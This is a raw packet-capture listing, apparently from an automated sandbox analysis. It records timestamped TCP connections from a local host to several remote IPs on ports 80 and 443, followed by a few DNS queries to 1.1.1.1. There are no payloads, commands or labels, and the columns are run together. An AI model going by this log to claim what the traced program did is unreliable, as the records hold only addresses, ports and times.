                                                                                                                                                    Feb 20, 2025 20:02:29.591025114 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.591106892 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.591116905 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.591155052 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.666798115 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.666860104 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.666922092 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.666968107 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.667004108 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.667047024 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.668061018 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.668104887 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.668112040 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.668148041 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.674477100 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.674515963 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.674525023 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.674563885 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.680560112 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.680617094 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.680634022 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.680674076 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.686948061 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.686999083 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.687025070 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.687068939 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.693397999 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.693443060 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.693479061 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.693525076 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.699255943 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.699302912 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.699354887 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.699398994 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.705282927 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.705329895 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.705363035 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.705408096 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.711335897 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.711385965 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.711416960 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.711457968 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.717282057 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.717320919 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.717365026 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.717412949 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.723273993 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.723336935 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.723388910 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.723438025 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.729288101 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.729352951 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.754055977 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.754115105 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.754172087 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.754219055 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.754252911 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.754295111 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.754334927 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.754396915 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.754424095 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.754468918 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.754503012 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.754547119 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.755649090 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.755696058 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.758754969 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.758797884 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.758830070 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.758877993 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.763087034 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.763133049 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.763170004 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.763214111 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.767622948 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.767668962 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.767718077 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.767760038 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.767798901 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.767839909 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.771867037 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.771922112 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.771949053 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.771989107 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.776123047 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.776166916 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.776204109 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.776247978 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.780431032 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.780487061 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.780514956 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.780554056 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.784728050 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.784792900 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.784813881 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.784856081 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.789177895 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.789227009 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.789267063 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.789313078 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.793483019 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.793550014 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.793576002 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.793612003 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.797889948 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.797957897 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.797974110 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.798096895 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.802517891 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.802572966 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.802608013 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.802655935 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.806551933 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.806633949 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.806641102 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.806683064 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.810967922 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.811036110 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.811055899 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.811099052 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.815222025 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.915625095 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.915688992 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.915817976 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.915862083 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.916593075 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.916646004 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.916677952 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.916723013 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.919775963 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.919837952 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.919857025 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.919903040 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.920327902 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.920377016 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.920409918 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.920454979 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.923604965 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.923667908 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.923702955 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.923749924 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.923789978 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.923835993 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.923870087 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.923916101 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.929374933 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.929435015 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.929470062 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.929517984 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.929563999 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.929605961 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.929646015 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.929692984 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.931298018 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.931343079 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.931406021 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.931452036 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.931494951 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.931555986 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.931581974 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.931624889 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.933698893 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.933743000 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.933787107 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.933831930 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.933876991 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.933918953 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.933958054 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.934000969 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.936091900 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.936141014 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.936175108 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.936230898 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.936908960 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.936959028 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.936996937 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.937058926 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.938437939 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.938667059 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.938678980 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.938720942 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.939870119 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.939919949 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.939959049 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.940006971 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.941216946 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.941282034 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.941302061 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.941345930 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.942686081 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.942743063 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.942766905 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.942810059 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.944204092 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.944281101 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.944286108 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.944325924 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.945631981 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.945683956 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.945715904 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.945771933 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.948123932 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.948189974 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.948196888 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.948236942 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.950114012 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.950172901 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.950176954 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.950211048 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.950216055 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.950253010 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.950257063 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.950299025 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.954449892 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.954509974 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.954520941 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.954561949 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.954627991 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.954675913 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.954679012 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.954691887 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.954722881 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.954746008 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.954857111 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.954911947 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.954916954 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.954955101 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.961154938 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.961224079 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.961299896 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.961344957 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.961388111 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.961438894 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.961515903 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:29.961570978 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.972150087 CET49976443192.168.2.7172.217.16.129
                                                                                                                                                    Feb 20, 2025 20:02:29.972165108 CET44349976172.217.16.129192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:30.198153019 CET4997780192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:30.203339100 CET8049977132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:30.203422070 CET4997780192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:30.203558922 CET4997780192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:30.208636999 CET8049977132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:30.882239103 CET8049977132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:30.888998032 CET4997780192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:30.895189047 CET8049977132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:31.095360994 CET8049977132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:31.147629023 CET4997780192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:31.723601103 CET49978443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:31.723647118 CET44349978104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.851562977 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.851658106 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:41.851942062 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:41.851962090 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:41.897793055 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:42.374116898 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.375593901 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:42.375633955 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.539982080 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.540070057 CET44349993104.21.32.1192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.540136099 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:42.540592909 CET49993443192.168.2.7104.21.32.1
                                                                                                                                                    Feb 20, 2025 20:02:42.621726990 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:42.627583027 CET8049992132.226.247.73192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.627657890 CET4999280192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:42.630310059 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:42.630337954 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:42.630415916 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:42.630878925 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:42.630897045 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.245961905 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.246046066 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:43.249089956 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:43.249104023 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.249521017 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.253535986 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:43.295337915 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.484970093 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.485068083 CET44349994149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:43.485138893 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:43.505203009 CET49994443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:49.229187965 CET4998080192.168.2.7132.226.247.73
                                                                                                                                                    Feb 20, 2025 20:02:49.452531099 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:49.452616930 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:49.452703953 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:49.452949047 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:49.452981949 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.059931993 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.061398983 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:50.061469078 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.061547041 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:50.061564922 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.358791113 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.358905077 CET44349995149.154.167.220192.168.2.7
                                                                                                                                                    Feb 20, 2025 20:02:50.358980894 CET49995443192.168.2.7149.154.167.220
                                                                                                                                                    Feb 20, 2025 20:02:50.359474897 CET49995443192.168.2.7149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Feb 20, 2025 20:02:25.172689915 CET  50664        53         192.168.2.7  1.1.1.1
Feb 20, 2025 20:02:25.180116892 CET  53           50664      1.1.1.1      192.168.2.7
Feb 20, 2025 20:02:26.321118116 CET  50485        53         192.168.2.7  1.1.1.1
Feb 20, 2025 20:02:26.328789949 CET  53           50485      1.1.1.1      192.168.2.7
Feb 20, 2025 20:02:30.187308073 CET  55852        53         192.168.2.7  1.1.1.1
